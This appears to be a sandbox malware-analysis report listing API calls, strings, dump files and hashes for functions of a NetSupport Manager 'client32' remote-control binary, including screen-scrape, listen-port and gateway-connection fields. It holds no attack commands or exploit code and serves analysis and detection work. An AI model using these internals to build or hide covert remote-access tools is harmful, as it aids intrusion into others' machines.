Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89

SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
CloseHandle.KERNEL32(00000000), ref: 1102EA6C
FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
DestroyCursor.USER32(00000000), ref: 1102EE7E
DestroyCursor.USER32(00000000), ref: 1102EE92
GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C

Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

DispatchMessageA.USER32(?), ref: 1102FA96
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
SetWindowPos.USER32(0003042E,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
wsprintfA.USER32 ref: 1102FFA5
PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F

Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,461C6054,00000002,76232EE0), ref: 1112820A
Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E

Strings

DisableRunplugin, xrefs: 1102F110
istaService, xrefs: 1102E6DB
Global\NSMWClassAdmin, xrefs: 1102FF9A
*ListenPort, xrefs: 1103009E
Windows 2012, xrefs: 1102F81B
IsILS returned %d, isvistaservice %d, xrefs: 1102ECBA
Intel error "%s", xrefs: 1102ED48
NoFTWhenLoggedOff, xrefs: 1102F315
RestartAfterError, xrefs: 1102F003
DisableJoinClass, xrefs: 1102F1E7, 1102F285
Windows Millennium, xrefs: 1102F525
Windows NT, xrefs: 1102F588
Windows 2012 R2, xrefs: 1102F898
Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 110303E4
UseLegacyPrintCapture, xrefs: 1102F440
*BeepSound, xrefs: 1102F3A5
AssertTimeout, xrefs: 1102EF23
V12.00.8, xrefs: 1102F987
Windows 10 x64, xrefs: 1102F8F7
MiniDumpType, xrefs: 1102EF41
istaUI, xrefs: 1102E6F6
_debug, xrefs: 1102FA09
DisableTSAdmin, xrefs: 1102F051
DisableJournal, xrefs: 1102F22F, 1102F2CD
Windows 7, xrefs: 1102F773
Windows Ding.wav, xrefs: 1102F3DA
Windows 98, xrefs: 1102F4F5
NSM.LIC, xrefs: 1102EAFD, 1102EB9B
Windows 10, xrefs: 1102F8C7
DisableJournalMenu, xrefs: 1102F247, 1102F2E5
Windows 8 x64, xrefs: 1102F7EA
Windows Vista, xrefs: 1102F6A9
\Explorer.exe, xrefs: 110302FD
Windows 95, xrefs: 1102F4C4
TracePriv, xrefs: 1102FA04
ScreenScrape, xrefs: 1102F128, 1102F152, 1102F17C
EnableGradientCaptions, xrefs: 1102EED0, 1102EEE7, 1102EF08
*ScreenScrape, xrefs: 1102FAD1, 1102FB1A, 1102FD4C
Info. Client running as user=%s, type=%d, xrefs: 1102EA22
Windows 8, xrefs: 1102F7C2
DisableAudioFilter, xrefs: 1102F0A2, 1102F47C
NeedsReinstall, xrefs: 1102EFDC
General, xrefs: 1102EF28, 1102F008, 1102F377, 1102F3AA
*BeepUsingSpeaker, xrefs: 1102F372
Windows 8.1, xrefs: 1102F849
NSSWControl32, xrefs: 11030121
OS2, xrefs: 1102F567
NSMWClassVista, xrefs: 1102E775
NSMWClass, xrefs: 1102E786, 1102E967, 1102EA74, 1102FF8F
CLIENT32.CPP, xrefs: 1102E80A, 1102ED9B
hClientRunning = %x, pid=%d (x%x), xrefs: 1102EAAA
LSPloaded=%d, WFPloaded=%d, xrefs: 1102EFBA
NSMWControl32, xrefs: 110300F2
Error. Could not load transports - perhaps another client is running, xrefs: 1102FC63
Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 11030346
Windows 7 x64, xrefs: 1102F794
Client, xrefs: 1102EAC9, 1102EFE1, 1102F06E, 1102F08F, 1102F0FD, 1102F115, 1102F12D, 1102F157, 1102F181, 1102F1B7, 1102F1EC, 1102F204, 1102F21C, 1102F234, 1102F24C, 1102F264, 1102F28A, 1102F2A2, 1102F2BA, 1102F2D2, 1102F2EA, 1102F302, 1102F31A, 1102F332, 1102F445, 1102FA2B, 1102FAD6, 1102FB1F, 1102FCFA, 1102FD51, 1102FD6D, 1102FD94, 1102FEA4, 1102FEBF, 1102FEE0, 1102FFD1
closed ok, xrefs: 1102EA5E
DisableReplayMenu, xrefs: 1102F1FF, 1102F29D
ShowKBEnable, xrefs: 1102F1B2
NSA.LIC, xrefs: 1102EB0B, 1102EB12, 1102EB35
Windows XP, xrefs: 1102F5E3
client32, xrefs: 1102EBE5, 1102ED82
DisableRequestHelp, xrefs: 1102F217, 1102F2B5
View, xrefs: 1102EAD5, 1102EED5, 1102EEEC, 1102EF0D
EnableSmartcardAuth, xrefs: 1102FEDB
Windows 2000, xrefs: 1102F5B5
CabinetWClass, xrefs: 11030257
Audio, xrefs: 1102F0A7, 1102F481
EnableSmartcardLogon, xrefs: 1102FE9F
gClient.hNotifyEvent, xrefs: 1102E80F
Windows 2008 x64, xrefs: 1102F73C
301389, xrefs: 1102FB8D, 1102FBE6, 1102FC27, 1102FD04
cl32main, xrefs: 1102E673
Bridge, xrefs: 1102EABD
UseNTSecurity, xrefs: 1102FEBA
TraceIPC, xrefs: 1102FFFF
Session shutting down, exiting..., xrefs: 1102E7CE
DisableAudio, xrefs: 1102F069, 1102F08A, 1102F0F8, 1102F25F, 1102F2FD
UseIPC, xrefs: 1102FFCC
Windows 2008, xrefs: 1102F710
Error. Wrong hardware. Terminating, xrefs: 1102ECE9
TCPIP, xrefs: 110300A3
Error x%x reading nsm.lic, sesh=%d, xrefs: 1102EB66
Windows XP Ding.wav, xrefs: 1102F3E1
win8ui, xrefs: 1102EDE8
*StartupDelay, xrefs: 1102FA26
AlwaysOnTop, xrefs: 1102FD8F
Windows CE, xrefs: 1102F959
Info. Client already running, pid=%d (x%x), xrefs: 1102E9CF
Windows 2003 x64, xrefs: 1102F672
DisableConsoleClient, xrefs: 1102F039, 1102F0CE
Ready, xrefs: 11030161
Windows Vista x64, xrefs: 1102F6D7
_debug, xrefs: 1102EDED, 1102EF46, 11030004
Windows 8.1 x64, xrefs: 1102F86C
*PriorityClass, xrefs: 1102FD68
DisableHelp, xrefs: 1102F32D
pcicl32, xrefs: 1102E954
Windows XP x64, xrefs: 1102F639
Windows 2016, xrefs: 1102F92E
Windows 2003, xrefs: 1102F60A
Default, xrefs: 110300EB, 1103011A, 11030143
NSTWControl32, xrefs: 1103014A
Info. Trying to close client, xrefs: 1102EA34
V12.10.8, xrefs: 1102F98E, 1102F9C2

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$301389$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
API String ID: 1099283604-646960681
Opcode ID: 0cb7a766abd34e2c29f6e790b2184919878d3f7c1274e6837e3e9d4553cc52ea
Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
Opcode Fuzzy Hash: 0cb7a766abd34e2c29f6e790b2184919878d3f7c1274e6837e3e9d4553cc52ea
Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52

Function 1102DB00 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DFF4
$session$, xrefs: 1102E2B6
ts macaddr=%s, xrefs: 1102E01C
NSM.LIC, xrefs: 1102DB22
Client, xrefs: 1102DEE5, 1102DF1D, 1102E034
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102E274, 1102E2F3
14/03/16 10:38:31 V12.10F8, xrefs: 1102E3BE
screenscrape, xrefs: 1102DF18
%02d, xrefs: 1102E238
WTSQuerySessionInformationA, xrefs: 1102DF9E
TCPIP, xrefs: 1102DF05
client32, xrefs: 1102DE25
client32.ini, xrefs: 1102DD55
MacAddress, xrefs: 1102E02F
Error x%x reading %s, sesh=%d, xrefs: 1102DDB1
%session%, xrefs: 1102E2CA
%sessionname%, xrefs: 1102E289, 1102E2A2
DisableConsoleClient, xrefs: 1102DE67
client32 dbi %hs, xrefs: 1102E3C3
WTSFreeMemory, xrefs: 1102E061
ClientName, xrefs: 1102E0E5
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102E3EA
%s.%02d, xrefs: 1102E250
Warning: Unexpanded clientname=<%s>, xrefs: 1102E1F3
TSMode, xrefs: 1102DEE0
Wtsapi32.dll, xrefs: 1102DF2C
ListenPort, xrefs: 1102DF00
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102E410
301389, xrefs: 1102E145, 1102E30B, 1102E32F, 1102E33C, 1102E36C, 1102E3E1
IsA(), xrefs: 1102E279, 1102E2F8
, xrefs: 1102E0B5
NSMWClass, xrefs: 1102DCE4

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: _malloc_memsetwsprintf
String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$301389$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 3802068140-1953357614
Opcode ID: 42e7776b6859df5dacee09d9e1e89e67e5f5d15013712b0b0c2d6de332e02c97
Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
Opcode Fuzzy Hash: 42e7776b6859df5dacee09d9e1e89e67e5f5d15013712b0b0c2d6de332e02c97
Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51

Function 6D1D3D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 6D1D3D27

Strings

CLIENT_ADDR=%s, xrefs: 6D1D3F4A
CMPI=%u, xrefs: 6D1D3FEA
Port, xrefs: 6D1D3DCA
APPTYPE=%d, xrefs: 6D1D41DD
CMD=OPEN, xrefs: 6D1D3EB9
connection_index == 0, xrefs: 6D1D3D7A
A4=%s, xrefs: 6D1D41BD
PORT=%d, xrefs: 6D1D3F68
CHATID, xrefs: 6D1D400A
1.1, xrefs: 6D1D3E02
A1=%s, xrefs: 6D1D40AF
CLIENT_NAME=%s, xrefs: 6D1D3F17
CHATID=%s, xrefs: 6D1D4046
TCPIP, xrefs: 6D1D3DCF, 6D1D3DDF
CLIENT_VERSION=1.0, xrefs: 6D1D3ED0
*Gsk, xrefs: 6D1D3E24
ListenPort, xrefs: 6D1D3DDA
301389, xrefs: 6D1D3F0C
A3=%s, xrefs: 6D1D4163
client247, xrefs: 6D1D400F, 6D1D406B, 6D1D40D1, 6D1D412B, 6D1D4185
A2=%s, xrefs: 6D1D4109
MAXPACKET=%d, xrefs: 6D1D3F01
HOSTNAME=%s, xrefs: 6D1D3F9A
GSK=%s, xrefs: 6D1D3FCC
PROTOCOL_VER=%u.%u, xrefs: 6D1D3EEB
*Dept, xrefs: 6D1D41F4
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6D1D3D75
DEPT=%s, xrefs: 6D1D420C

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: _memset
String ID: *Dept$*Gsk$1.1$301389$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
API String ID: 2102423945-4053615097
Opcode ID: eb4583a5eea4e0b771ef7bc065ae5b39be478e70a505d9052da278a495b8b964
Instruction ID: d9ee72862511c564d36860af2610d7cd28c0783d0cc663072b71a2007690cc92
Opcode Fuzzy Hash: eb4583a5eea4e0b771ef7bc065ae5b39be478e70a505d9052da278a495b8b964
Instruction Fuzzy Hash: 6BE1B2B2C4452C6ACB21DB60CC80FFFB3789F19209F4145CAF609A6146EBB45B84DFA1

Function 110A9C90 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(setupapi.dll,461C6054,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
_free.LIBCMT ref: 110A9D60
GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
GetLastError.KERNEL32 ref: 110A9D9D
_malloc.LIBCMT ref: 110A9DB3
GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
SetLastError.KERNEL32(00000078), ref: 110A9E1B
GetLastError.KERNEL32 ref: 110A9E21
_free.LIBCMT ref: 110A9E33
SetLastError.KERNEL32(00000078), ref: 110A9E44
SetLastError.KERNEL32(00000078), ref: 110A9E51
_free.LIBCMT ref: 110A9E64
FreeLibrary.KERNEL32(?,?), ref: 110A9E74
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18

Strings

SetupDiGetClassDevsA, xrefs: 110A9CDB
setupapi.dll, xrefs: 110A9CBB
SetupDiEnumDeviceInterfaces, xrefs: 110A9D26
SetupDiDestroyDeviceInfoList, xrefs: 110A9EC0
SetupDiGetDeviceInterfaceDetailA, xrefs: 110A9D6C, 110A9DCF

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
API String ID: 3464732724-3340099623
Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50

Function 11133920 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278
libraryloadertimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,461C6054), ref: 1113398E
LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
GetCurrentProcess.KERNEL32 ref: 11133A27
GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
SetLastError.KERNEL32(00000078), ref: 11133A68
GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
SetLastError.KERNEL32(00000078), ref: 11133AC9
SetLastError.KERNEL32(00000078), ref: 11133AD6
GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
SetLastError.KERNEL32(00000078), ref: 11133B01
FreeLibrary.KERNEL32(?), ref: 11133C6B
FreeLibrary.KERNEL32(?), ref: 11133C78
FreeLibrary.KERNEL32(?), ref: 11133C82

Strings

RestartHandles, xrefs: 11133BE7
_debug, xrefs: 11133972
GetProcessMemoryInfo, xrefs: 11133AE2
GetGuiResources, xrefs: 11133A7E, 11133AA6
Date=%04d-%02d-%02d, xrefs: 111339AB
Client, xrefs: 11133BC1, 11133BEC, 11133C13, 11133C3A
RestartMB, xrefs: 11133BBC
Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB, xrefs: 11133B73
RestartGdiObj, xrefs: 11133C0E
RestartUserObj, xrefs: 11133C35
psapi.dll, xrefs: 111339C3
CheckLeaks, xrefs: 1113396D
GetProcessHandleCount, xrefs: 11133A4B

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
API String ID: 263027137-1001504656
Opcode ID: 149598a2661f75f6a88bca6016e53709e6f8f2ae6bf4947ec8c9771d858cf79e
Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
Opcode Fuzzy Hash: 149598a2661f75f6a88bca6016e53709e6f8f2ae6bf4947ec8c9771d858cf79e
